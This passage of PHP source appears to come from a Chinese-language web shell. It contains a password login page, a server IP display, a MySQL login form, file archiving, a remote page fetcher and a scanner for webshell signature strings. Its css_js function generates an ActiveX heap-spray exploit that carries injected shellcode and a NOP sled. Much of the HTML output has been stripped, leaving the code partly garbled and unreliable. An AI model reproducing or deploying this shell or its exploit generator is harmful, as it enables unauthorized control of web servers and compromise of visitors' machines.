strlen($name) ); $dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); $dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; $this->dirstr .= $dirstr; $this -> file_count ++; $this -> dirstr_len += strlen($dirstr); $this -> datastr_len += $my_datastr_len; } function createfile(){ $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" . pack('v', $this -> file_count) . pack('v', $this -> file_count) . pack('V', $this -> dirstr_len) . pack('V', $this -> datastr_len) . "\x00\x00"; fwrite($this->fp,$this->dirstr.$endstr); fclose($this->fp); } } function start_unzip($tmp_name,$new_name,$todir='zipfile'){ $zip = new ZipArchive() ; if ($zip->open($tmp_name) !== TRUE) { echo '抱歉!压缩包无法打开或损坏'; } $zip->extractTo($todir); $zip->close(); echo '解压完毕!   进入解压目录   返回'; } function muma($filecode,$filetype){ $dim = array( "php" => array("eval(","exec("), "asp" => array("WScript.Shell","execute(","createtextfile("), "aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"), "jsp" => array("runtime.exec(") ); foreach($dim[$filetype] as $code){ if(stristr($filecode,$code)) return true; } } function debug($file,$ftype){ $type=explode('|',$ftype); foreach($type as $i){ if(stristr($file,$i)) return true; } } /*---string---*/ function str_path($path){ return str_replace('//','/',$path); } function msg($msg){ die(""); } function uppath($nowpath){ $nowpath = str_replace('\\','/',dirname($nowpath)); return urlencode($nowpath); } function xxstr($key){ $temp = str_replace("\\\\","\\",$key); $temp = str_replace("\\","\\\\",$temp); return $temp; } /*---html---*/ function html_ta($url,$name){ html_n("$name"); } function html_a($url,$name,$where=''){ html_n("$name "); } function html_img($url){ html_n(""); } function back(){ html_n(""); } function html_radio($namei,$namet,$v1,$v2){ html_n(''.$namei); html_n(''.$namet.'

'); } function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){ if($mode){ html_n("$text"); }else{ html_n("$text "); } } function html_base(){ html_n('function base64encode(str){ var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; var out, i, len; var c1, c2, c3; len = str.length; i = 0; out = ""; while (i < len) { c1 = str.charCodeAt(i++) & 0xff; if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt((c1 & 0x3) << 4); out += "=="; break; } c2 = str.charCodeAt(i++); if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt((c2 & 0xF) << 2); out += "="; break; } c3 = str.charCodeAt(i++); out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6)); out += base64EncodeChars.charAt(c3 & 0x3F); } return out; } function utf16to8(str) { var out, i, len, c; out = ""; len = str.length; for(i = 0; i < len; i++) { c = str.charCodeAt(i); if ((c >= 0x0001) && (c <= 0x007F)) { out += str.charAt(i); } else if (c > 0x07FF) { out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F)); out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F)); out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); } else { out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F)); out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); } } return out; } function utf8to16(str) { var out, i, len, c; var char2, char3; out = ""; len = str.length; i = 0; while(i < len) { c = str.charCodeAt(i++); switch(c >> 4) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: out += str.charAt(i-1); break; case 12: case 13: char2 = str.charCodeAt(i++); out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F)); break; case 14: char2 = str.charCodeAt(i++); char3 = str.charCodeAt(i++); out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0)); break; } } return out; } '); } function html_text($name,$cols,$rows,$value = ''){ html_n("

"); } function html_select($array,$mode = '',$change = '',$name = 'class'){ html_n(""); } function html_font($color,$size,$name){ html_n("$name"); } function GetHtml($url) { $c = ''; $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)'; if(function_exists('fsockopen')){ $link = parse_url($url); $query=$link['path'].'?'.$link['query']; $host=strtolower($link['host']); $port=$link['port']; if($port==""){$port=80;} $fp = fsockopen ($host,$port, $errno, $errstr, 10); if ($fp) { $out = "GET /{$query} HTTP/1.0\r\n"; $out .= "Host: {$host}\r\n"; $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $inheader=1; while(!feof($fp)) {$line=fgets($fp,4096); if($inheader==0){$contents.=$line;} if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;} } fclose ($fp); $c= $contents; } } if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $c = curl_exec($ch); curl_close($ch); } if(empty($c) && ini_get('allow_url_fopen')){ $c = file_get_contents($url); } if(empty($c)){ echo "document.write('
');"; } if(!empty($c)) { return $c; } } function html_main($path,$shellname){ $serverip=gethostbyname($_SERVER['SERVER_NAME']); print<<{$shellname}
{$serverip}
END; html_n("
"); } function islogin($shellname,$myurl){ print<<body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}

{$shellname}

输入密码:


请于用于非法用途,后果作者概不负责!
END; } function html_sql(){ html_input("text","sqlhost","localhost","
MYSQL地址","30"); html_input("text","sqlport","3306","
MYSQL端口","30"); html_input("text","sqluser","root","
MYSQL用户","30"); html_input("password","sqlpass","","
MYSQL密码","30"); html_input("text","sqldb","dbname","
MYSQL库名","30"); html_input("submit","sqllogin","登陆","
"); html_n(''); } function Mysql_Len($data,$len) { if(strlen($data) < $len) return $data; return substr_replace($data,'...',$len); } function html_n($data){ echo "$data\n"; } /*---css---*/ function css_img($img){ $images = array( "exe"=> "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". "xhIAOw==", "dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA". "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE". "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "txt"=> "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". "UpPWG3Ig6Hq/XmRjuZwkAAA7", "html"=> "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". "ADs=", "js"=> "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". "a00AjYYBbc/o9HjNniUAADs=", "xml"=> "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". "IQA7", "mp3"=> "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "img"=> "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". "FxEAOw==", "title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+". "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL". "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", "rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/". "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b". "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC". "aNOmRcjVj02tPxPCzfkvIAA7" ); header('Content-type: image/gif'); echo base64_decode($images[$img]); die(); } function css_showimg($file){ $it=substr($file,-3); switch($it){ case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break; case "htm": case "tml": return 'html';break; case "exe": case "com": return 'exe';break; case "xml": case "doc": return 'xml';break; case ".js": case "vbs": return 'js';break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break; case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break; default: return 'txt';break; } } function css_js($num,$code = ''){ if($num == "shellcode"){ return '<%@ LANGUAGE="JavaScript" %> <% var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1"); var shellcode = unescape("'.$code.'"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length'; } html_n(''); } function css_left(){ html_n(''); html_n('